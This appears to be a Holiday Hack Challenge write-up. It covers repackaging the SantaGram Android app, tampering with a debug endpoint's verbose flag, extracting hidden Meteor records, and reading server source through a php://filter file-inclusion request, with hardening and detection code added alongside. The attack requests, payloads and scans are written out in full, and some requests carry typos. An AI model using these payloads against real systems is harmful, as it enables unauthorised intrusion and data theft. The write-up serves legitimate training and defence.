.catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0
:cond_0
:goto_1
const v0, 0x7f0d0087
invoke-virtual {p0, v0}, Lcom/northpolewonderland/santagram/EditProfile;->findViewById(I)Landroid/view/View;
move-result-object v0
check-cast v0, Landroid/widget/ImageView;
iget-object v1, p0, Lcom/northpolewonderland/santagram/EditProfile;->b:Lcom/parse/ParseUser;
sget-object v2, Lcom/northpolewonderland/santagram/Configs;->USER_AVATAR:Ljava/lang/String;
To make it do what I wanted it to, I needed to edit the EditProfile.smali file. Needed to change some code to enable the debugging functionality in the application. Right now when I click on the Edit Profile button, I can edit my profile, description, name, etc.
When I change the code in the EditProfile.smali file from if-eqz v0, :cond_0 to if-eqz v0, :try_start_0, as shown in the code below, the debugging functionality will be enabled and it should make requests to the server after the APK file has been rebuilt.
iget-object v1, p0, Lcom/northpolewonderland/santagram/EditProfile;->a:Landroid/app/ProgressDialog;
invoke-virtual {v1, v2}, Landroid/app/ProgressDialog;->setIndeterminate(Z)V
if-eqz v0, :try_start_0
:try_start_0
new-instance v0, Lorg/json/JSONObject;
invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
new-instance v1, Ljava/text/SimpleDateFormat;
const-string v2, "yyyyMMddHHmmssZ"
Rebuilt the SantaGram application using apktool(1) so it could be run in the emulator. This just puts everything back to the way it was. I renamed the file so it wouldn’t overwrite the original, just in case I messed something up. There were no build errors. So, I assume there weren’t any issues.
apktool b SantaGram_4.3
I: Using Apktool 2.2.1-dirty
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building apk file...
I: Copying unknown files/dir...
After the application was repackaged, it needed to be signed before it would run. I went through the tutorial provided by one of the elves in the North Pole to create a key with keytool. I signed the application with jarsigner. Once that was completed, I installed the application in the emulator.
I configured Burp Suite to accept traffic from the emulator. I think I went into the Edit Profile portion of the application. It sent a request to dev.northpolewonderland.com. Which is exactly what I wanted.
Looks like it’s sending stuff. Nothing totally useful here. So, I allowed it to send the request to the server.
Request to http://dev.northpolewonderland.com 80 [35.184.63.245]
POST /index.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; Apk Testing Suite Build/MRA58K)
Host: dev.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 144
{
"date":"20161228214123-0500",
"udid":"29bac7367116194d",
"debug":"com.northpolewonderland.santagram.EditProfile, EditProfile",
"freemem":20372096
}
Below is the response to the request I sent above. There is an interesting little bit here. There is a verbose option currently set to false. It would be safe to assume that this could be changed to true and this would provide more data.
Response
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 29 Dec 2016 02:43:23 GMT
Content-Type: application/json
Connection: close
Content-Length: 250
{
"date":"20161229024323",
"status":"OK",
"filename":"debug-20161229024323-0.txt",
"request":
{
"date":"20161228214123-0500",
"udid":"29bac7367116194d",
"debug":"com.northpolewonderland.santagram.EditProfile, EditProfile",
"freemem":20372096,
"verbose":false
}
}
So, I crafted the request and set the verbose parameter to true. The server provided a lot more data in its response. It was actually more excessive. So excessive in fact that it provides the name of the next audio file. Name of the next audio file is debug-20161224235959-0.mp3. Now it’s time to see if I can download it.
Response
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 29 Dec 2016 02:44:32 GMT
Content-Type: application/json
Connection: close
Content-Length: 436
{
"date":"20161229024432",
"date.len":14,
"status":"OK",
"status.len":"2",
"filename":"debug-20161229024432-0.txt",
"filename.len":26,
"request":
{
"date":"20161228214123-0500",
"udid":"29bac7367116194d",
"debug":"com.northpolewonderland.santagram.EditProfile, EditProfile",
"freemem":20372096,
"verbose":true,
},
"files":
[
"debug-20161224235959-0.mp3",
"debug-20161229024206-0.txt",
"debug-20161229024323-0.txt",
"debug-20161229024432-0.txt",
"index.php"
]
}
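What the verbose flag did on the server side is worth spelling out, because it is the bug, not the audio file, that matters to whoever runs an endpoint like this: the server took its verbosity from the client and, when asked, dumped its own directory listing into the response. The Python below is an added example, not the code behind dev.northpolewonderland.com. weak_handler models the behaviour seen in the two responses above (echoed request, .len fields and a files array once verbose is true), and hardened_handler shows the same endpoint with a fixed schema, a server-side verbosity setting and no file names in any response. The request body and the directory listing are constructed from the values quoted above.

```python
"""A debug-collection endpoint, weak and hardened.

Added example, not the code of dev.northpolewonderland.com: a minimal model
of the /index.php handler observed in the writeup. The weak version echoes the
request back and, when the client sends "verbose": true, appends field lengths
and the upload directory listing, which is how the .mp3 name leaked. The
hardened version accepts only known fields, ignores a client-supplied verbose
flag and never reveals directory contents. Request and listing are constructed.
"""
import json
from datetime import datetime, timezone

# Constructed stand-in for the server's upload directory.
UPLOAD_DIR_LISTING = ["debug-20161224235959-0.mp3", "debug-20161229024206-0.txt", "index.php"]

# Constructed request in the shape the patched app sent through Burp, with verbose set.
SAMPLE_REQUEST = json.dumps({
    "date": "20161228214123-0500",
    "udid": "29bac7367116194d",
    "debug": "com.northpolewonderland.santagram.EditProfile, EditProfile",
    "freemem": 20372096,
    "verbose": True,
}).encode()

# Fixed clock so the file names are reproducible.
NOW = datetime(2016, 12, 29, 2, 44, 32, tzinfo=timezone.utc)


def weak_handler(body: bytes, now: datetime = NOW, listing=UPLOAD_DIR_LISTING) -> dict:
    """Trusts the client: every key is echoed back and 'verbose' unlocks extra output."""
    req = json.loads(body)
    req.setdefault("verbose", False)
    stamp = now.strftime("%Y%m%d%H%M%S")
    resp = {"date": stamp, "status": "OK", "filename": f"debug-{stamp}-0.txt", "request": req}
    if req["verbose"]:
        for key in ("date", "status", "filename"):
            resp[f"{key}.len"] = len(resp[key])
        resp["files"] = list(listing)  # the directory listing that exposed the audio file
    return resp


# Field name -> (expected type, maximum length) for the hardened handler.
ALLOWED_FIELDS = {"date": (str, 32), "udid": (str, 32), "debug": (str, 256), "freemem": (int, None)}


def hardened_handler(body: bytes, now: datetime = NOW, server_verbose: bool = False) -> dict:
    """Validates a fixed schema; verbosity is a server setting, never a request key."""
    try:
        req = json.loads(body)
    except (json.JSONDecodeError, UnicodeDecodeError):
        return {"status": "ERROR", "reason": "malformed JSON"}
    if not isinstance(req, dict):
        return {"status": "ERROR", "reason": "JSON object expected"}
    accepted = {}
    for key, (typ, max_len) in ALLOWED_FIELDS.items():
        value = req.get(key)
        if isinstance(value, bool) or not isinstance(value, typ):
            return {"status": "ERROR", "reason": f"missing or invalid field: {key}"}
        if max_len is not None and len(value) > max_len:
            return {"status": "ERROR", "reason": f"field too long: {key}"}
        accepted[key] = value
    # Unknown keys such as "verbose" are dropped here: never echoed, never acted on.
    stamp = now.strftime("%Y%m%d%H%M%S")
    resp = {"date": stamp, "status": "OK", "filename": f"debug-{stamp}-0.txt"}
    if server_verbose:
        resp["accepted_fields"] = sorted(accepted)  # diagnostics only, no file names
    return resp


if __name__ == "__main__":
    print(json.dumps(weak_handler(SAMPLE_REQUEST), indent=1))
    print(json.dumps(hardened_handler(SAMPLE_REQUEST, server_verbose=True), indent=1))
```

Run stand-alone it prints both responses side by side: the weak one carries the files array exactly as the verbose response above does, the hardened one returns only the three fields the client needs. The two design choices that close the hole are that the schema is a whitelist (so an extra key cannot change behaviour) and that anything diagnostic is keyed off a server-side setting rather than request content.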
I downloaded the file using the wget(1) command. Now I have the file. Stating the obvious because I don’t know what else to say.
wget http://dev.northpolewonderland.com/debug-20161224235959-0.mp3
--2016-12-28 18:45:12-- http://dev.northpolewonderland.com/debug-20161224235959-0.mp3
Resolving dev.northpolewonderland.com (dev.northpolewonderland.com)... 35.184.63.245
HTTP request sent, awaiting response... 200 OK
Length: 218033 (213K) [audio/mpeg]
Saving to: 'debug-20161224235959-0.mp3'
debug-20161224235959-0.mp3 100%[==================================>] 212.92K 67.5KB/s
2016-12-28 18:45:18 (67.5 KB/s) - 'debug-20161224235959-0.mp3' saved [218033/218033]
The Banner Ad Server
I will attempt to explain this part as best I can. Lot of this is done through a web browser and this blog has a no images policy. Sorry, I’m stubborn.
Found the URL for the Banner Ad Server in the strings.xml file in the APK file. Initially, I looked for it using the string “ad”. But, that didn’t prove very fruitful. So, I decided to use “ads” (plural) and I found the domain for it. Domain name is ads.northpolewonderland.com.
grep -A 10 -rnw . -e "ads"
./res/values/strings.xml:29: <string name="banner_ad_url">http://ads.northpolewonderland.com/affiliate/C9E380C8-2244-41E3-93A3-D6C6700156A5</string>
./res/values/strings.xml-30- <string name="bottom_sheet_behavior">android.support.design.widget.BottomSheetBehavior</string>
./res/values/strings.xml-31- <string name="character_counter_pattern">%1$d / %2$d</string>
./res/values/strings.xml-32- <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
Decided to check the port information on the server; it's been useful so far. Looks like the only information of use is the open http port. The ssh ports haven't really been of much use. The fun has been with the web servers anyway.
nmap ads.northpolewonderland.com
Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-22 20:48 CST
Nmap scan report for ads.northpolewonderland.com (104.198.221.240)
Host is up (0.075s latency).
rDNS record for 104.198.221.240: 240.221.198.104.bc.googleusercontent.com
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 11.82 seconds
When I went to the server's URL, http://ads.northpolewonderland.com, it looked like an ad server: "Stupid ads for Stupid people." In the report I mention that I checked the login form for comments, but that didn't help me much.
This is a JavaScript website, so maybe this was the server using the Meteor Framework. One of the elves in the North Pole provides a tutorial on Meteor Miner, a browser extension that walks through the records, routes, templates, subscriptions, etc. that the Meteor Framework leaks to the client.
The output I'm seeing in the picture here shows the following data. Not a whole lot stood out to me. In the report I state that the /admin/quotes route looked interesting, but when I attempted to go to it, it stated that I needed to log in before I could use it.
Meteor Miner
Toggle Loaded Only
Collections
HomeQuotes 4 Records
Satisfaction 1 Record
Subscriptions
meteorlogin ServiceConfiguration
_roles
meteor_autoupdate_clientVersions
quotes
satisfaction
Templates
Home
MasterLayout
Nav
Routes
/aboutus >
/admin/quotes >
/affiliate/affiliateId >
/campaign/create >
/campaign/share >
/create >
/ >
/login >
/manage >
/register >
However, there were about five records in the Collections data. One of which was an audio file. So I decided to examine that a little.
Field Details for HomeQuotes
4 records
_id, hidden, index, quote
1 record
_id, audio, hidden, index, quote
I opened up element inspection and went to the console. I ran the command HomeQuotes.find().fetch(). The output provided about five objects, one of which was the audio file, which was actually hidden from view. The find() function lets you find documents within a specific collection in the Meteor Framework. Coupled with the fetch() function with no arguments, it returns all of the documents in the resulting array. In this case, it provides the relative URL to the discombobulated audio file: /ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3.
HomeQuotes.find().fetch()
[> Object, > Object, > Object, >Object, Object]
_id: "zPRSTpxB5mcAH3pYk"
audio: "/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3"
hidden: true
index: 4
quote: "Just Ad It!"
> __proto__: Object
Went to the URL and it was certainly a discombobulated audio file.
The following command could have been used to download the file. In the report I actually downloaded it from the browser though.
wget http://ads.northpolewonderland.com/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3
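The console query above works because a Meteor publication ships documents into the client's minimongo cache, and a template choosing not to render a row does nothing to keep that row out of the cache. The following is an added example, not code from the challenge or from Meteor itself: a plain JavaScript model of a leaky publication beside a hardened one. The sample collection, the quote texts and the findFetch helper are constructed for the example; field names follow the Meteor Miner output above.

```javascript
// Added example (not code from the challenge or from Meteor itself): a plain
// JavaScript model of why HomeQuotes.find().fetch() in the browser console
// exposed a record the page never rendered. Whatever a Meteor publication
// sends is cached client-side in minimongo, so the client can query all of it.

// Constructed sample collection. Field names follow the Meteor Miner output
// above (_id, hidden, index, quote, audio); the quote texts are made up.
const HomeQuotes = [
  { _id: 'q1', hidden: false, index: 0, quote: 'Sample quote one' },
  { _id: 'q2', hidden: false, index: 1, quote: 'Sample quote two' },
  { _id: 'q3', hidden: false, index: 2, quote: 'Sample quote three' },
  { _id: 'q4', hidden: false, index: 3, quote: 'Sample quote four' },
  { _id: 'zPRSTpxB5mcAH3pYk', hidden: true, index: 4, quote: 'Just Ad It!',
    audio: '/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3' },
];

// Stand-in for Collection.find(selector, { fields }).fetch(): filter by exact
// match on the selector, then project to the requested fields (Meteor always
// keeps _id).
function findFetch(docs, selector = {}, options = {}) {
  const { fields } = options;
  return docs
    .filter(doc => Object.entries(selector).every(([k, v]) => doc[k] === v))
    .map(doc => {
      if (!fields) return { ...doc };
      const out = { _id: doc._id };
      for (const [k, on] of Object.entries(fields)) {
        if (on && k in doc) out[k] = doc[k];
      }
      return out;
    });
}

// Leaky publication: what a Meteor.publish that returns HomeQuotes.find()
// (or the autopublish package) ships to every client, hidden rows included.
function publishHomeQuotesLeaky(docs) {
  return findFetch(docs);
}

// Hardened publication: only rows that are meant to be shown, and only the
// fields the Home template renders. `audio` and the hidden row never leave
// the server, so no console query can reach them.
function publishHomeQuotesHardened(docs) {
  return findFetch(docs, { hidden: false }, { fields: { index: 1, quote: 1 } });
}

// What a console query sees: every audio path present in the client-side
// cache. Templates hiding a row do nothing here.
function audioPathsInClientCache(published) {
  return published.filter(d => typeof d.audio === 'string').map(d => d.audio);
}
```

In a real Meteor app the hardened function body is what the server-side `Meteor.publish('quotes', function () { ... })` should return, after removing the `autopublish` package (`meteor remove autopublish`); the server-side selector and `fields` projection are the control, because anything published is queryable from the console exactly as shown above.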
The Uncaught Exception Handler Server
Found the URL for the Exception Handling server in the strings.xml file. Used the grep command to search through the decompiled SantaGram application directory. When I looked for it back then, I found the URL for this server in the b.java file. Below is the output of the command, which shows the URL.
grep -A 3 -rnw . -e "exception"
./res/values/strings.xml:35: <string name="exhandler_url">http://ex.northpolewonderland.com/exception.php</string>
./res/values/strings.xml-36- <string name="title_activity_comments">Comments</string>
./res/values/strings.xml-37-</resources>
Poked at the ex.northpolewonderland.com URL with Nmap and it showed that SSH and HTTP were open. Looks like HTTP is the only port that I would have needed to worry about.
nmap ex.northpolewonderland.com
Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-22 20:48 CST
Nmap scan report for ex.northpolewonderland.com (104.154.196.33)
Host is up (0.087s latency).
rDNS record for 104.154.196.33: 33.196.154.104.bc.googleusercontent.com
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 8.30 seconds
I set up Burp Suite and started poking around. I attempted to hit the URL through a web browser just to see what the response says. The response shot back with the following data.
Your request must be POST
Instead of just fiddling with random requests, I decided to proxy and fire up the Android emulator with the application installed. The objective was to see if I could make the application mad so it would send exception data to ex.northpolewonderland.com. Decided to open up a post within the application that contains a large number of comments. Loading the comments caused the application to crash, so the application sent the data to the exception server. Looked through the POST requests that the app sent to the exception server and found one with an exceptional dump of data to look through.
Request
Raw
POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; Tab2A7-20F Build/KOT49H)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 1149
{
"data":
{
"model":"Tab2A7-20F",
"vmheapszlimit":"268435456",
"totalstor":"15852994556",
"udid":"a4f0fd77e07442a9",
"vmallocmem":"74804152",
"product":"Tab2A7-20F",
"busystor":"1462247424",
"freestor":"123052032",
"cpuusage":"0.0",
"vmheapsz":"82481152",
"device":"Tab2A7-20F",
"lversion":"3.4.67",
"sdkint":"19",
"strace":"java.lang.NullPointerException\n\tat com.northpolewonderland.santagram.Comments$2$a$1.done(Unknown Source\n\tat android.os.Handler.handleCallback(Handler.java:808)\n\tat android.os.Handler.dispatchMessage(Handler.java:103)\n\tat java.lang.reflect.Method.invokeNative(Native Method)\n\tat java.lang.relect.Method.invoke(Method.java:515)\n\tat com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.jave:825)\n\tat com.android.internal.os.ZygoteInit.main(ZygoteInit.java:541)\n\tat dalvik.system.NativeStart.main(Native Method)\n",
"natallocmem":"7475432"
},
"operation":"WriteCrashDump"
}
After the response came back, it showed that a crash dump named crashdump-pz8n9E.php had been written to the docs/ folder on the server. It could have been viewed by browsing to http://ex.northpolewonderland.com/docs/crashdump-pz8n9E.php.
Response
Raw
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Mon, 25 Dec 2016 07:12:29 GMT
Content-Type: text/html: charset=UTF-8
Connection: close
Content-Length: 81
{
"success": true,
"folder": "docs",
"crashdump": "crashdump-pz8n9E.php"
}
Decided to move on and test the keys. So I attempted to change a couple of keys to see which ones would generate an error. When there was a typo in the operation key, it threw an error. This is the only key I have documented that threw an error; there may be others.
Request
Raw
POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; Tab2A7-20F Build/KOT49H)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 1149
{
"data":
{
"model":"Tab2A7-20F",
"vmheapszlimit":"268435456",
"totalstor":"15852994556",
"udid":"a4f0fd77e07442a9",
"vmallocmem":"74804152",
"product":"Tab2A7-20F",
"busystor":"1462247424",
"freestor":"123052032",
"cpuusage":"0.0",
"vmheapsz":"82481152",
"device":"Tab2A7-20F",
"lversion":"3.4.67",
"sdkint":"19",
"strace":"java.lang.NullPointerException\n\tat com.northpolewonderland.santagram.Comments$2$a$1.done(Unknown Source\n\tat android.os.Handler.handleCallback(Handler.java:808)\n\tat android.os.Handler.dispatchMessage(Handler.java:103)\n\tat java.lang.reflect.Method.invokeNative(Native Method)\n\tat java.lang.relect.Method.invoke(Method.java:515)\n\tat com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.jave:825)\n\tat com.android.internal.os.ZygoteInit.main(ZygoteInit.java:541)\n\tat dalvik.system.NativeStart.main(Native Method)\n",
"natallocmem":"7475432"
},
"operaion":"WriteCrashDump"
}
The response to this request returned the following error. Looks like the operation JSON key needs to be set to either WriteCrashDump or ReadCrashDump. I assume this means the application will either read or write crash dumps on the server.
Response
Raw
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Mon, 25 Dec 2016 07:09:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 82
Fatal error! JSON key 'operation' must be set to WriteCrashDump or
ReadCrashDump.
Moved on to test more keys.
Request
Raw
POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; Tab2A7-20F Build/KOT49H)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 1149
{
"data":
{
"model":"Tab2A7-20F",
"vmheapszlimit":"268435456",
"totalstor":"15852994556",
"udid":"a4f0fd77e07442a9",
"vmallocmem":"74804152",
"product":"Tab2A7-20F",
"busystor":"1462247424",
"freestor":"123052032",
"cpuusage":"0.0",
"vmheapsz":"82481152",
"device":"Tab2A7-20F",
"lversion":"3.4.67",
"sdkint":"19",
"strace":"java.lang.NullPointerException\n\tat com.northpolewonderland.santagram.Comments$2$a$1.done(Unknown Source\n\tat android.os.Handler.handleCallback(Handler.java:808)\n\tat android.os.Handler.dispatchMessage(Handler.java:103)\n\tat java.lang.reflect.Method.invokeNative(Native Method)\n\tat java.lang.relect.Method.invoke(Method.java:515)\n\tat com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.jave:825)\n\tat com.android.internal.os.ZygoteInit.main(ZygoteInit.java:541)\n\tat dalvik.system.NativeStart.main(Native Method)\n",
"natallocmem":"7475432"
},
"operaion":"ReadCrashDump"
}
Response
Raw
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Mon, 25 Dec 2016 07:09:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 82
Fatal error! JSON key 'crashdump' must be set.
Request
Raw
POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; Tab2A7-20F Build/KOT49H)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 1149
{
"date":
{
"crashdump":"crashdump-pz8n9E"
}
"operaion":"ReadCrashDump"
}
Response
Raw
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Mon, 25 Dec 2016 07:15:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 1202
{
"model": "Tab2A7-20F",
"vmheapszlimit": "268435456",
"totalstor": "1585299456",
"udid": "a4f0fd77e07442a9",
"vnallocmem": "74804152",
"product": "Tab2A7-20F",
"busystor": "1462247424",
"freestor": "123052032",
"cpuusage": "0.0",
"vmheapsz": "824481152",
"device": "Tab2A7-20F",
"lversion": "3.4.57",
"sdkint": "19",
"strace": "java.lang.NullPointerException\n\tat
con.northpolewonderland.santagram.Comment$2$a$1.done(Unkown
Source)\n\tat
com.northpolewonderland.santagram.Comments$2$a$1.done(Unkown
Source)\n\tat com.parse.ParseTaskUtils$2$1.run(Unknown Source)\n\tat
android.os.Handler.handleCallback(Handler.java:808)\n\tat
android.os.Handler.dispatchMessage(Handler.java:103)\n\tat
android.os.Looper.loop(Looper.java:193)\n\tat
android.app.ActivityThread.main(ActivityTread.java:5341)\n\tat
java.lang.reflect.Method.invokeNative(Native Method)\n\tat
java.lang.reflect.Method.invoke(Method.java:515)\n\tat
com.andoid.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:
825)\n\tat"
}
Request
Raw
POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; Tab2A7-20F Build/KOT49H)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 106
{
"date":
{
"crashdump":"php://filter/convert.base64-encode/resource=exception"
}
"operaion":"ReadCrashDump"
}
Response
Raw
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Mon, 26 Dec 2016 07:35:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3168
PD9waMAgCgojIEF1ZGlvIGZpb5GUgZnJvb5BEaXNjb21ibZJ1bGF0b3Iqaw4gd2Vicw9vd
DogZGzY29tYm9idWxhdGVkLMF1ZGlvLTYtWHl5RTN00Vlx505ILmlwHwoKIyBDb2RlI
GZyb20gaMR0cDovL3RoaXNpbnRlcmVzdHHtZS5jb20vcnVJZWlZaW5nLWpzbZ4tcG9zd
C1kYXRhLXZpYS1waHAVC1MgTWFrZSBzdxJL1HRoYXQgaXOgaXMgY58QT1NUIHJLCXVlc
...
<?php
# Audio file from Discombobulator in webroot: discombobulated-audio-6-XyxE3N9YqKNH.mp3
# Code from http://thisintrestsme.com/receiving-json-post-data-via-php/
# Make sure that it is a POST request.
if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){
die("Request mothod must be POST\n");
}
# Make sure the content type of the POST request has been set to application/json
$contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER['CONTENT_TYPE']) : '';
if(strcasecmp($contentType, 'application/json') != 0){
die("Content type must be: application/json\n");
}
# Grab the raw POST. Necessary for JSON in particular.
$content = file_get_contents("php://input");
$obj = json_decode($content, true);
# If json_decode failed, the JSON is invalid.
if(!is_array($obj)){
die("POST contains invalid JSON\n");
}
# Process the JSON.
if ((!isset($obj['operation'])) or (
$obj['operation'] !== "WriteCrashDump" and
$obj['operation'] !== "ReadCrashDump"))
{
die("Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.\n");
}
...
wget http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3
--2016-12-28 18:45:12-- http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3
Resolving ex.northpolewonderland.com (ex.northpolewonderland.com)... 104.154.196.33
Connecting to ex.northpolewonderland.com (ex.northpolewonderland.com)|104.154.196.33|:80...connected.
HTTP request sent, awaiting response... 200 OK
Length: 223244 (218K) [audio/mpeg]
Saving to: 'discombobulated-audio-6-XyzE3N9YqKNH.mp3'
discombobulated-au 100%[==================================>] 218.01K 576KB/s in 0.4s
2016-12-28 18:45:18 (67.5 KB/s) - 'discombobulated-audio-6-XyzE3N9YqKNH.mp3' saved [223244/223244]
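The php://filter trick worked because the ReadCrashDump branch turned the caller-supplied crashdump value straight into an include target. The block below is an added example, not the challenge's exception.php (which is PHP): a JavaScript model of that lookup with a weak version beside a hardened one, plus a small detector for proxy or application logs that keep POST bodies. The docs directory path and the crashdump-XXXXXX naming pattern are assumptions based on the crashdump-pz8n9E name seen above, and the sample request bodies are constructed in the shape of the requests shown earlier.

```javascript
// Added example (not the challenge's exception.php, which is PHP): a JavaScript
// model of the ReadCrashDump lookup. The weak version builds the include
// target straight from the caller-supplied "crashdump" value, which is why a
// php://filter wrapper could read exception.php's own source. The hardened
// version allow-lists the name. The naming pattern and webroot layout are
// assumptions based on the crashdump-pz8n9E name seen above.

const DOCS_DIR = '/var/www/html/docs';                // assumed layout
const CRASHDUMP_NAME = /^crashdump-[A-Za-z0-9]{6}$/;   // assumed naming scheme

// Weak: the equivalent of include('docs/' . $obj['crashdump'] . '.php').
// Any string the caller sends becomes part of the include target.
function crashdumpTargetWeak(name) {
  return 'docs/' + name + '.php';
}

// Hardened: only a server-generated-looking name passes. The regex leaves no
// room for '/', '..', ':' or NUL, so wrappers and traversal cannot get through,
// and the result is always a single file directly under DOCS_DIR.
function crashdumpTargetHardened(name) {
  if (typeof name !== 'string' || !CRASHDUMP_NAME.test(name)) return null;
  return DOCS_DIR + '/' + name + '.php';
}

// Detection side: flag request bodies whose crashdump value carries a stream
// wrapper, traversal or a path separator. Useful over proxy or app logs that
// keep POST bodies.
const SUSPICIOUS = [
  /^[a-z][a-z0-9.+-]*:\/\//i,  // php://, file://, data:// style wrappers
  /\.\./,                      // directory traversal
  /[\/\\]/,                    // any path separator
  /\0/,                        // NUL byte truncation
];

function suspiciousCrashdump(body) {
  let obj;
  try { obj = JSON.parse(body); } catch (e) { return false; } // server rejects bad JSON anyway
  const value = obj && obj.data && obj.data.crashdump;
  return typeof value === 'string' && SUSPICIOUS.some(re => re.test(value));
}

// Constructed sample bodies in the shape of the requests above.
const SAMPLE_BODIES = [
  '{"data":{"crashdump":"crashdump-pz8n9E"},"operation":"ReadCrashDump"}',
  '{"data":{"crashdump":"php://filter/convert.base64-encode/resource=exception"},"operation":"ReadCrashDump"}',
  '{"data":{"crashdump":"../exception"},"operation":"ReadCrashDump"}',
];

function countSuspicious(bodies = SAMPLE_BODIES) {
  return bodies.filter(suspiciousCrashdump).length;
}
```

The point of the allow-list is that it validates the shape of what the server itself generates rather than trying to deny-list bad substrings; the SUSPICIOUS patterns are for detection only, not for input validation, since a deny-list is what an LFI payload is built to get around.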
The Mobile Analytics Server (post authentication)
nmap -A -O analytics.northpolewonderland.com
Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-22 20:48 CST
Nmap scan report for dev.northpolewonderland.com (35.184.63.245)
Host is up (0.087s latency).
rDNS record for 35.184.63.245: 245.63.184.35.bc.googleusercontent.com
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024
| 2048
|_ 256
443/tcp open ssl/http nginx 1.6.2
| http-git:
| 104.198.252.157:443/.git
| Git repository found!
| Repository description: Unname repository: edit this file 'description' to name the...
|_ Last commit message: Finishing touches (styles, css, etc.)
|_http-server-header: nginx/1.6.2
| http-title: Sprusage Usage Reporter!
|_Requested resource was login.php
| ssl-cert: Subject: commonName=analytics.northpolewonderland.com
| Subject Alternative Name: DNS:analytics.northpolewonderland.com
| Not valid before: 2016-12-07T17:35:00
|_Not valid after: 2017-03-07T17:35:00
|_ssl-date: TLS randomness does not represent time
| tls-nextprotong:
|_ http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|2.6.X (90%)
OS CPE: cpe:/o:linux:linux_kernel:3.2.0 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 3.2.0 (90%), Linux 2.6.18 - 2.6.22 (86%)
Network Distance: 13 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
For each of those six items, which vulnerabilities did you discover and exploit?
This is explained in the sections above. Please read. Hugs and kisses. – Timothy (n3s0)
REMEMBER, YOU ARE AUTHORIZED TO ATTACK ONLY THE IP ADDRESSES THAT TOM HESSMAN IN THE NORTH POLE EXPLICITLY ACKNOWLEDGES AS “IN SCOPE.” ATTACK NO OTHER SYSTEMS ASSOCIATED WITH THE HOLIDAY HACK CHALLENGE.
8. What are the names of the audio files you discovered from each system above?
There are a total of SEVEN audio files (one from the original APK in Question 4, plus one for each of the six items in the bullet list above.)
- The first file was found by extracting it from the res/raw/ directory in the APK. It was embedded in the SantaGram_v4.2.apk file: discombobulatedaudio1.mp3
- This audio file can be found by logging into the Mobile Analytics server with the credentials embedded in the SantaGram_v4.2.apk file. Obtained it by downloading the server: discombobulatedaudio2.mp3
- The audio file was found by using the debugging feature within the game named GDT. The command allowed someone to move through text in the game that led to a secret ending, which provided an email address. Needed to email peppermint@northpolewonderland.com, who sent the audio file shortly after: discombobulatedaudio3.mp3
- The audio file was found by enabling the debugging function in the SantaGram application. Once it was on, the app would send requests to the debugging server. I could then proxy these requests and modify them before they hit the server. Depending on how the request was recrafted, the server would provide a more verbose response, which exposed the contents of the web server's root directory: debug-20161224235959-0.mp3
- The audio file was found on the Banner Ad Server. Found this by exploiting an information leakage flaw that exposed application data that shouldn't be exposed, including subscriptions, routes, and records: discombobulatedaudio5.mp3
